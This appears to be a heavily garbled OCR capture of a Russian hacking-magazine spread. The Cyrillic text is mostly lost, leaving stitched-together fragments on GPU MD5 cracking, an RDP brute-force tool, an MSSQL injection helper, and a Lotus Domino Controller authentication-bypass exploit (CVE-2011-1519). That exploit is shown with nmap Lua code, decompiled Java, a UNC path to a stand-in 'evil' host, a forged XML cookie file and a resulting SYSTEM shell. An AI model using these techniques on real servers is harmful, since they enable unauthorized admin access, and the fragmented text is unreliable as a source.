    , md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt, Open. n !

    .

    VS. CPU VS. GPU , , ighashgpu n MD5- , , RainbowCrack


    MD5

    >> . n.

    MDCrack, CPU [ ).

    GPU (nVidia GeForce GT 220), CPU (Intel Atom N450, ) ~

    GPU CPU 4 ee:ee:el ee :ee:el ::l 5 :: : :9 : :l

    ::l ee:es:21 : : 1 7 ee::ll 9:27:52 ::4

    , CPU , GPU >> . , ,

    . , , 4- 5- ,

    n . ,

    . , - .

    . -, , MD5 SHA1. - SHA-2 S

    [ ). -, .

    >> . - , . , 100 %, . ::::


    [figure: screenshot of the RDP brute-force tool (tabs: Plugins, RDP, Hosts list, Files, Settings; caption "Hack the Planet!")]




    [figure: installer screenshot (config.php, MySQL settings for the control panel); Google dork from the search screenshot: intitle:"CN" "Your JavaScript is turned off. Please, enable ..."]


    , Digital Security (twitter.com/asintsov)

    Lotus,

    IBM Lotus Domino Server -

    IBM Lotus Software,

    IBM Lotus Notes.

    www.zerodayinitiative.com - ZDI; www.ibm.com/software/ru/lotus/ - IBM Lotus Software; bugtraq.ru - BugTraq; dj.navexpress.com - DJ Java Decompiler. LOTUS DOMINO CONTROLLER , , , .

    .

    . IBM, . , , Lotus. . . Lotus

    : , , . . , ,

    . , , , .

    Lotus . : ] - , , names.nsf - .

    , , Lotus 8.5.2FP2. , exploit-db.com .

    BugTraq , ZDI, IBM suit- . , , ,


    . ,

    , . . - , .: ]

    CVE-2011-1519 , ,

    [ , ]. , ZDI ZDI-11-110,

    0day ( ]. :

  • . .

    UNC, . , SYSTEM>>.

    : ~ COOKIEFILE

    , \\evilhost\password_cookie_file, . , , . .

    , , 2050. , Lotus . .

    , . , ,

    , nmap.

    Ltus-, , ,

    . :

    socket:reconnect_ssl()
    socket:send("#API\n")
    socket:send(("#UI %s,%s\n"):format(user, pass))
    socket:receive_lines(1)
    socket:send("#EXIT\n")

    , Lotus- : SSL- ,

    #>>. , admin pass

    #UI admin,pass. , , nmap

    COOKIEFILE . , , #COOKIEFILE \\evil\file. , , [ ,

    ! .

    - . , Java, IDA , - . DJ decompiler (members.

    Nt-


    Lotus,

    fortunecity.com/neshkov/dj.html), j- :\Program Files\IBM\Lotus\Domino\Data\domino\java\dconsole.jar n Java- . , NewClient.class, .

    :

    // s1 - line received on 2050/tcp
    if (s1.equals("#EXIT"))
        return 2;
    if (s1.equals("#COOKIEFILE"))
        if (stringtokenizer.hasMoreTokens()) {
            // . : #COOKIEFILE < n >
            cookieFilename = stringtokenizer.nextToken().trim();
            return 7;
        }
    if (s1.equals("#UI"))
        if (stringtokenizer.hasMoreTokens()) {
            // ...
            usr = stringtokenizer.nextToken(",").trim();
            if (usr == null) return 4;
            if (stringtokenizer.hasMoreTokens()) // ,
                pwd = stringtokenizer.nextToken().trim();
            return ;
        }

    . :

    /* */
    do {
        // ReadFromUser -
        int i = ReadFromUser();
        if (i == ) { // #APPLET
            appletConnection = true;
            continue;
        }
        ...
        userinfo = UserManager.findUser(usr);
        if (userinfo == null) {
            // . .. !
            WriteToUser("NOT_REG_ADMIN");
            continue;
        }
        if (!appletConnection) // #APPLET,
            flag = vrfyPwd.verifyUserPassword(pwd, userinfo.userPWD());
        else // #APPLET / COOKIE? !
            flag = verifyAppletUserCookie(usr, pwd);
        ...
    } while (true); // end loop
    if (flag) // ,
        // , !

    , #APPLET #UI #COOKIEFILE. , , ,


    admindata.xml. , no n, [ NOT_REG_ADMIN !' whoami NT AUTHORITY\SYSTEM

    C:\Lotus\Domino\data>

    n , n n . , n #API , API Java-, -

    , ncat . , Lotus , n SMBRelay.

    ? , . ?

    , -. -,


    SMB- ? , , UNC ( , !.

    , - . , IBM

    , : cookiefile .>> . ,

    - \\evil\cookie\file, , : .\\evil\cookie\file, UNC . , SSL-,

    . . IBM! , cookiefile,

    , - XML- XML- . XML,

    ' , , IBM, XML- :

    <?xml version="1.0" encoding="UTF-8"?>
    <user name="admin" cookie="dsecrg" address="dsecrg">

    :

    Bla-a-a<user name="admin" xXXxcookie="dsecrg"Xaddress="dsecrg"NYA>

    >>

    . : 1. cookievalues Microsoft I

    service ( \\n- Entel:

    ncat targethost 49152
    GET /

  • Mar licq 884888, http://snipper.rul


    : scarletO URL: bit.ly/tl56m2 :

    Windows

    -

    MSSQL Injection Helper - , n SQL-

    . ,

    n MSSQL. ,

    n n n SQL-.

    : Microsoft SQL Server; GUI-

    ;

    ; ; , ;

    n ; ;

    ;

    . , ' MSSQL Injection Helper

    , , URL (, site.com/script.asp?id=1).


    :

    URL:

    3. 14.y/r u/md5 : Win dows

    D5-

    ?

    BarsWF - World Fastest MD5 cracker.

    n , 5-

    . ? npor : +

    ; + -

    n; + ;

    MD5; ; . u :

    1. . n, Intel 2 Quad QX6700 (3,01 GHz)

    200 n '

    2. Radeon: